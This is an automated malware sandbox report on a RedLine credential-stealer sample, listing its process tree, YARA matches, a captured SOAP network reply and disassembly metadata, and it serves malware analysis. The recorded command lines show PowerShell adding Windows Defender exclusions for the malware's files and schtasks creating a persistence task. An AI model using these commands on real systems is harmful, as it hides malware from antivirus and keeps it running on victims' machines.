                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:22:31:54
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\I5pvP0CU6M.exe"
                                                        Imagebase:0x860000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                                                        Imagebase:0x310000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                                                        Imagebase:0x310000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"
                                                        Imagebase:0x690000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:22:32:01
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\I5pvP0CU6M.exe"
                                                        Imagebase:0x5c0000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:22:32:01
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:22:32:04
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Imagebase:0x590000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 68%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:22:32:04
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff717f30000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:22:32:11
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp"
                                                        Imagebase:0x690000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:22:32:11
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:22:32:11
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                                                        Imagebase:0x20000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:22:32:11
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                                                        Imagebase:0xf10000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:22:32:12
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:9.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:9%
                                                          Total number of Nodes:167
                                                          Total number of Limit Nodes:10
                                                          execution_graph 35684 2b87178 35685 2b871a3 35684->35685 35702 2b86bf0 35685->35702 35689 2b8720a 35690 2b86c00 2 API calls 35689->35690 35691 2b87228 35690->35691 35692 2b86bf0 2 API calls 35691->35692 35693 2b87246 35692->35693 35694 2b86c00 2 API calls 35693->35694 35695 2b87264 35694->35695 35696 2b86c00 2 API calls 35695->35696 35697 2b872c4 35696->35697 35698 2b86bf0 2 API calls 35697->35698 35699 2b872e2 35698->35699 35701 2b876fb 35699->35701 35710 2b86d94 35699->35710 35703 2b86bfb 35702->35703 35704 2b871ec 35703->35704 35705 2b86d94 2 API calls 35703->35705 35706 2b86c00 35704->35706 35705->35704 35707 2b86c0b 35706->35707 35708 2b8860b 35707->35708 35714 10c5d04 35707->35714 35708->35689 35711 2b86d9f 35710->35711 35713 10c5d04 2 API calls 35711->35713 35712 2b8838c 35712->35701 35713->35712 35716 10c5d0f 35714->35716 35715 10c8749 35715->35708 35716->35715 35718 10ccea1 35716->35718 35719 10cced1 35718->35719 35720 10ccef5 35719->35720 35723 10cd180 35719->35723 35727 10cd171 35719->35727 35720->35715 35725 10cd18d 35723->35725 35724 10cd1c7 35724->35720 35725->35724 35731 10cb470 35725->35731 35728 10cd180 35727->35728 35729 10cd1c7 35728->35729 35730 10cb470 2 API calls 35728->35730 35729->35720 35730->35729 35732 10cb475 35731->35732 35734 10cdee0 35732->35734 35735 10cb554 35732->35735 35734->35734 35736 10cb55f 35735->35736 35737 10c5d04 2 API calls 35736->35737 35739 10cdf4f 35737->35739 35738 10cdf89 35738->35734 35742 10cfcc0 35739->35742 35748 10cfcb0 35739->35748 35744 10cfcf1 35742->35744 35745 10cfdf1 35742->35745 35743 10cfcfd 35743->35738 35744->35743 35754 2b80ba8 35744->35754 35758 2b80b98 35744->35758 35745->35738 35750 10cfcf1 35748->35750 35751 10cfdf1 35748->35751 35749 10cfcfd 35749->35738 35750->35749 35752 2b80ba8 2 API calls 35750->35752 35753 2b80b98 2 API calls 35750->35753 35751->35738 35752->35751 35753->35751 35755 2b80bd3 35754->35755 35756 2b80c82 35755->35756 35762 2b81a71 35755->35762 35760 2b80bd3 35758->35760 35759 2b80c82 35759->35759 35760->35759 35761 2b81a71 2 API calls 35760->35761 35761->35759 35766 2b81ad0 35762->35766 35770 2b81ac4 35762->35770 35767 2b81b38 CreateWindowExW 35766->35767 35769 2b81bf4 35767->35769 35771 2b81ad0 CreateWindowExW 35770->35771 35773 2b81bf4 35771->35773 35774 10c4668 35775 10c4672 35774->35775 35779 10c4758 35774->35779 35784 10c4210 35775->35784 35777 10c468d 35780 10c477d 35779->35780 35788 10c4868 35780->35788 35792 10c4859 35780->35792 35785 10c421b 35784->35785 35800 10c5c84 35785->35800 35787 10c6ffa 35787->35777 35790 10c488f 35788->35790 35789 10c496c 35789->35789 35790->35789 35796 10c44d4 35790->35796 35793 10c4868 35792->35793 35794 10c496c 35793->35794 35795 10c44d4 CreateActCtxA 35793->35795 35795->35794 35797 10c58f8 CreateActCtxA 35796->35797 35799 10c59bb 35797->35799 35801 10c5c8f 35800->35801 35804 10c5ca4 35801->35804 35803 10c7225 35803->35787 35805 10c5caf 35804->35805 35808 10c5cd4 35805->35808 35807 10c7302 35807->35803 35809 10c5cdf 35808->35809 35810 10c5d04 2 API calls 35809->35810 35811 10c7405 35810->35811 35811->35807 35814 10cd298 35815 10cd2de GetCurrentProcess 35814->35815 35817 10cd329 35815->35817 35818 10cd330 GetCurrentThread 35815->35818 35817->35818 35819 10cd36d GetCurrentProcess 35818->35819 35820 10cd366 35818->35820 35821 10cd3a3 35819->35821 35820->35819 35822 10cd3cb GetCurrentThreadId 35821->35822 35823 10cd3fc 35822->35823 35824 ebd01c 35825 ebd034 35824->35825 35826 ebd08e 35825->35826 35831 2b81c88 35825->35831 35836 2b829e8 35825->35836 35842 2b829f8 35825->35842 35848 2b81c78 35825->35848 35832 2b81cae 35831->35832 35834 2b829f8 2 API calls 35832->35834 35835 2b829e8 2 API calls 35832->35835 35833 2b81ccf 35833->35826 35834->35833 35835->35833 35837 2b829f8 35836->35837 35838 2b82a57 35837->35838 35853 2b82b80 35837->35853 35858 2b82c4c 35837->35858 35864 2b82b70 35837->35864 35843 2b82a25 35842->35843 35844 2b82a57 35843->35844 35845 2b82c4c 2 API calls 35843->35845 35846 2b82b80 2 API calls 35843->35846 35847 2b82b70 2 API calls 35843->35847 35845->35844 35846->35844 35847->35844 35849 2b81cae 35848->35849 35851 2b829f8 2 API calls 35849->35851 35852 2b829e8 2 API calls 35849->35852 35850 2b81ccf 35850->35826 35851->35850 35852->35850 35855 2b82b94 35853->35855 35854 2b82c20 35854->35838 35869 2b82c38 35855->35869 35872 2b82c28 35855->35872 35859 2b82c0a 35858->35859 35860 2b82c5a 35858->35860 35862 2b82c38 2 API calls 35859->35862 35863 2b82c28 2 API calls 35859->35863 35861 2b82c20 35861->35838 35862->35861 35863->35861 35866 2b82b94 35864->35866 35865 2b82c20 35865->35838 35867 2b82c38 2 API calls 35866->35867 35868 2b82c28 2 API calls 35866->35868 35867->35865 35868->35865 35870 2b82c49 35869->35870 35875 2b84072 35869->35875 35870->35854 35873 2b82c49 35872->35873 35874 2b84072 2 API calls 35872->35874 35873->35854 35874->35873 35879 2b840a0 35875->35879 35883 2b84090 35875->35883 35876 2b8408a 35876->35870 35880 2b840e2 35879->35880 35882 2b840e9 35879->35882 35881 2b8413a CallWindowProcW 35880->35881 35880->35882 35881->35882 35882->35876 35884 2b840a0 35883->35884 35885 2b8413a CallWindowProcW 35884->35885 35886 2b840e9 35884->35886 35885->35886 35886->35876 35812 10cd4e0 DuplicateHandle 35813 10cd576 35812->35813 35887 10cadf0 35888 10cadff 35887->35888 35890 10caed9 35887->35890 35891 10caee5 35890->35891 35892 10caf1c 35891->35892 35893 10cb120 GetModuleHandleW 35891->35893 35892->35888 35894 10cb14d 35893->35894 35894->35888

                                                          Executed Functions

                                                          Function 02B87178 Relevance: 17.4, Strings: 13, Instructions: 1108COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $ $ $ $ $7$V$V$[$g$q$u
                                                          • API String ID: 0-3960767134
                                                          • Opcode ID: 54dece4f0182f1ab12792903be69cde85e746fb9721fbaef455e941a46c39e66
                                                          • Instruction ID: 975c0fdf4e9acd5630bc32df02df4a337a8614b1b758bd33ac100b87ae39c18c
                                                          • Opcode Fuzzy Hash: 54dece4f0182f1ab12792903be69cde85e746fb9721fbaef455e941a46c39e66
                                                          • Instruction Fuzzy Hash: 0BB21A30A10709CFC715EF74C894B9AB7B6FF89304F518699D54AAB360EB71A985CF80
                                                          Function 02B87168 Relevance: 17.3, Strings: 13, Instructions: 1084COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 278 2b87168-2b871d9 285 2b871e3-2b871e7 call 2b86bf0 278->285 287 2b871ec-2b871f7 285->287 289 2b87201-2b87205 call 2b86c00 287->289 291 2b8720a-2b8732b call 2b86c00 call 2b86bf0 call 2b86c00 call 2b86c10 call 2b86c20 call 2b86c00 call 2b86bf0 289->291 325 2b87335-2b87365 call 2b86c30 291->325 554 2b87368 call 2b8d968 325->554 555 2b87368 call 2b8d958 325->555 328 2b8736b-2b8738c 330 2b87392-2b873c7 call 2b86c40 328->330 332 2b873cc-2b8762c call 2b86c50 call 2b86c60 call 2b86c70 call 2b86c80 call 2b86c90 call 2b86c40 call 2b86c50 call 2b86c60 call 2b86c70 330->332 361 2b87631 332->361 362 2b8763b 361->362 363 2b87645 362->363 364 2b8764d-2b87653 363->364 365 2b8765a-2b8766f 364->365 366 2b87677-2b876ab 365->366 370 2b876b2-2b876d5 366->370 371 2b876db-2b876dd 370->371 372 2b876e7-2b876eb 371->372 373 2b876f1-2b876f5 372->373 374 2b876fb-2b87bf8 call 2b86c40 call 2b86c50 call 2b86c60 call 2b86c70 call 2b86c30 call 2b86c40 call 2b86c50 call 2b86c60 call 2b86c70 call 2b86c80 call 2b86ca0 call 2b86c90 call 2b86c30 call 2b86c40 call 2b86c50 call 2b86c60 call 2b86c70 373->374 375 2b882cd 373->375 437 2b87bfd-2b87c1f call 2b86ca0 374->437 376 2b882d2-2b88300 375->376 378 2b88307-2b88317 376->378 379 2b88302 call 2b86d94 376->379 379->378 441 2b87c2b-2b88093 call 2b86cb0 call 2b86c40 call 2b86c50 call 2b86c60 call 2b86cc0 call 2b86cd0 call 2b86ca0 call 2b86ce0 call 2b86cf0 call 2b86c40 call 2b86c50 call 2b86c60 call 2b86c70 call 2b86c40 call 2b86c50 call 2b86c60 call 2b86c70 call 2b86c80 call 2b86c90 call 2b86d00 call 2b86d10 437->441 500 2b8809f-2b880ba 441->500 502 2b880c0-2b88117 call 2b86d20 call 2b86d30 500->502 508 2b8811c-2b88126 502->508 509 2b8812c-2b8812e call 2b86d30 508->509 511 2b88133-2b8813d 509->511 512 2b88143-2b881c7 call 2b86d30 * 6 511->512 530 2b881cd-2b881d1 call 2b86d40 512->530 532 2b881d6-2b882a9 call 2b86d50 call 2b86d64 call 2b86c50 call 2b86d74 call 2b855cc 530->532 550 2b882b5-2b882c0 call 2b86d84 532->550 553 2b882c5-2b882cc 550->553 554->328 555->328
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $ $ $ $ $7$V$V$[$g$q$u
                                                          • API String ID: 0-3960767134
                                                          • Opcode ID: a08483938420376fe123eeaaacd935ae848cdbce4f6bb3e06587568fa8f1f383
                                                          • Instruction ID: 79627de12afa674da5c3ae24642a3fc95e52ba2e69e9894fcef5d6f5c5b39b4c
                                                          • Opcode Fuzzy Hash: a08483938420376fe123eeaaacd935ae848cdbce4f6bb3e06587568fa8f1f383
                                                          • Instruction Fuzzy Hash: 64B20B30A10709CFC715EF74C894B9AB7B6FF89304F518699D54AAB360EB71A985CF80
                                                          Function 058D7868 Relevance: .5, Instructions: 506COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4370ebfbecf516d9c6867a7e87fda57b37945ea947dec04382cffc62d12d1b9
                                                          • Instruction ID: f2a49a0a73978e0e5933c64e3718192bc02113bd4cdd74d1762ae61c319cad7d
                                                          • Opcode Fuzzy Hash: e4370ebfbecf516d9c6867a7e87fda57b37945ea947dec04382cffc62d12d1b9
                                                          • Instruction Fuzzy Hash: 34426F74A11229CFDB64CF69D984B9DBBF2FB48310F1181A9E809A7355D730AE81CF60
                                                          Function 058D6190 Relevance: .5, Instructions: 482COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be44fafe3c421b07e642bd64a99261e49ff2ce75adc733220ae1ff634fc915ee
                                                          • Instruction ID: ad1e998802a29de9c5845a3ea8951d9ef63c01faa81dcd6fd796d8c1e7aab47b
                                                          • Opcode Fuzzy Hash: be44fafe3c421b07e642bd64a99261e49ff2ce75adc733220ae1ff634fc915ee
                                                          • Instruction Fuzzy Hash: 5B32B270A00259CFEB54DFA9C580A8EFBF2BF48211F55D295D848AB215DB30DD86CFA0
                                                          Function 058D7859 Relevance: .2, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba987f070c32689bcfb5bdc8b2ee82be0cd70aaba95873a27ef6b7f0783aa366
                                                          • Instruction ID: c1b8823f08b756bc2b9d7a986d959b5102957abb042c31fa958d1a5e225ae936
                                                          • Opcode Fuzzy Hash: ba987f070c32689bcfb5bdc8b2ee82be0cd70aaba95873a27ef6b7f0783aa366
                                                          • Instruction Fuzzy Hash: D161A575E01218DFDB18CF6AD985B9DBBF2FF88310F1481A9E809AB254DB719941CF60
                                                          Function 058DA8B0 Relevance: .1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a6ac8e46b7bf6146995b7bf7b280b5302574a797aa9527bdf2924c6e0e3e052
                                                          • Instruction ID: f66ac0dd664b4edb7a3e45d7ff09dafba7828014a376f1ac0109b03ff91cf4ea
                                                          • Opcode Fuzzy Hash: 7a6ac8e46b7bf6146995b7bf7b280b5302574a797aa9527bdf2924c6e0e3e052
                                                          • Instruction Fuzzy Hash: 51517275D016199FDB08DFEAC9446EEFBF2BF89300F14812AD819AB254DB345946CF50
                                                          Function 058DD771 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9dfbdfed0d6f70f08cf659fac00f5b30ecaf49eaa186d828063410f3a43e3cdf
                                                          • Instruction ID: 9de61c3877dbb5ea3e8717eff3b68efdd01dcb6606603d38c8d698ba86f4988e
                                                          • Opcode Fuzzy Hash: 9dfbdfed0d6f70f08cf659fac00f5b30ecaf49eaa186d828063410f3a43e3cdf
                                                          • Instruction Fuzzy Hash: B941F474D062189BDB04CFAAD8856EEFBF6BF89300F10942AD819AB358DB7459058F60
                                                          Function 058D6183 Relevance: .1, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d459f7e364925d8521a3261a44ce5e6e44c95779d4b8f0db1f0741b52f9782b
                                                          • Instruction ID: 77d470042a2ad449e6a27375888f80fff79cf10cbc04ae230a6e34d0e262d603
                                                          • Opcode Fuzzy Hash: 3d459f7e364925d8521a3261a44ce5e6e44c95779d4b8f0db1f0741b52f9782b
                                                          • Instruction Fuzzy Hash: 2941D471E006189FEB58DFABC84179EFBF2BF89300F14C0A9D45DA6255EB305A858F61
                                                          Function 058DA8A0 Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92d4b636c86de5f0e331ea7c75517c5ed4ce790cc2968469d66f13eb158d805c
                                                          • Instruction ID: 7be01c2ce8b162304c742d7e1b830c6d9ed27d4010baad45cd8587f9293fe473
